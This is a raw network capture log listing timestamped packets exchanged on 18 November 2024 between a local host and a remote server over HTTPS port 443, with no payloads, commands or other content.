Nov 18, 2024 14:53:23.210097075 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.210427999 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.212587118 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.212855101 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.212881088 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.213155031 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.218400002 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.218648911 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.218703032 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.219060898 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.223565102 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.223802090 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.223855972 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.224091053 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.228635073 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.228858948 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.228914022 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.229290009 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.233808994 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.233998060 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.234050035 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.234072924 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.234265089 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.238781929 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.239012003 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.239453077 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.239690065 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.244082928 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.244337082 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.244390011 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.244700909 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.248872995 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.249119043 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.249172926 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.249485016 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.254154921 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.254401922 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.254457951 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.254767895 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.259078979 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.259309053 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.259362936 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.259597063 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.264379978 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.264614105 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.264668941 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.264977932 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.269388914 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.269644022 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.269697905 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.270013094 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.274467945 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.274743080 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.274796963 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.275082111 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.279282093 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.279525042 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.279577971 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.279815912 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.283817053 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.284055948 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.284113884 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.284430027 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.288264036 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.288515091 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.288568974 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.288804054 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.292418003 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.292663097 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.292715073 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.293009996 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.296663046 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.296861887 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.296916962 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.297199965 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.300415993 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.300849915 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.300935984 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.301109076 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.304573059 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.304795980 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.304855108 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.305139065 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.308115005 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.308362007 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.308384895 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.308583021 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.312041044 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.312216997 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.312231064 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.312509060 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.314448118 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.314686060 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.314698935 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.314878941 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.316821098 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.316999912 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.317007065 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.317255020 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.319190025 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.319375992 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.319382906 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.319545984 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.321588993 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.321754932 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.321760893 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.322154999 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.323908091 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.324193954 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.324201107 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.324539900 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.326339006 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.326514006 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.326520920 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.326905966 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.328699112 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.329067945 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.329072952 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.329236031 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.330982924 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.331140041 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.331146002 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.331360102 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.333355904 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.333548069 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.333553076 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.333764076 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.335597038 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.335823059 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.335827112 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.336041927 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.338004112 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.338202000 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.338206053 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.338469982 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.340238094 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.340548992 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.340554953 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.340864897 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.343118906 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.343285084 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.343288898 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.343503952 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.345196962 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.345484972 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.345496893 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.345715046 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.347098112 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.347510099 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.347527027 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.347815037 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.349473000 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.349678993 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.349690914 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.349862099 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.351574898 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.351708889 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.351713896 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.351878881 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.353837967 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.354013920 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.354024887 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.354212999 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.355997086 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.356277943 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.356293917 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.356497049 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.358510971 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.358712912 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.358721018 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.358908892 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.360387087 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.360692978 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.360697985 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.360878944 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.362483978 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.362720013 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.362725019 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.362938881 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.364852905 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.365009069 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.365016937 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.365227938 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.366776943 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.366961002 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.366966009 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.367232084 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.368885040 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.369229078 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.369240046 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.369569063 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.370964050 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.371284008 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.371293068 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.371467113 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.373094082 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.373271942 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.373282909 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.373522997 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.375221014 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.375395060 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.375399113 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.375758886 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.377326012 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.377511978 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.377516985 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.377681017 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.379420996 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.379631042 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.379635096 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.379941940 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.381432056 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.381561041 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.381572962 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.381778002 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.383500099 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.383698940 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.383709908 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.383869886 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.385466099 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.385771036 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.385782957 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.385988951 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.387525082 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.387702942 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.387715101 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.387897968 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.389472008 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.389704943 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.389714956 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.389877081 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.391464949 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.391720057 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.391730070 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.391908884 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.393779039 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.394011021 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.394021988 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.394306898 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.395374060 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.395608902 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.395623922 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.395854950 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.398916006 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.399198055 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.399209023 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.399353027 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.399590015 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.399825096 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.399836063 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.400170088 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.401209116 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.401452065 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.401479959 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.401798010 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.403105021 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.403362036 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.403388023 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.403630018 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.405112028 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.405359983 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.405414104 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.405728102 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.406968117 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.407212019 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.407267094 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.407500982 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.408986092 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.409216881 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.409267902 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.409606934 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.411649942 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.411884069 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.411938906 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.412142992 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.412168026 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.412225008 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.412456989 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.412457943 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.414199114 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.414438009 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.414491892 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.414776087 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.415504932 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.415709972 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.415760994 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.415992022 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.417104006 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.417345047 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.417396069 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.417737961 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.418808937 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.419042110 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.419095993 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.419408083 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.420433998 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.420685053 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.420738935 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.421058893 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.421781063 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.422023058 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.422075033 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.422388077 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.423419952 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.423652887 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.423707962 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.423938990 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.424954891 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.425201893 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.425256014 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.425528049 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.426457882 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.426695108 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.426749945 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.427064896 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.427866936 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.428092003 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.428147078 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.428523064 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.429429054 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.429671049 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.429724932 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.430037022 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.430953026 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.431196928 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.431251049 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.431632042 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.432254076 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.432488918 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.432540894 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.432852030 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.433756113 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.433991909 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.434046030 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.434279919 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.435000896 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.435261011 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.435312033 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.435595036 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.436233044 CET	443	49768	142.250.72.97	192.168.11.20
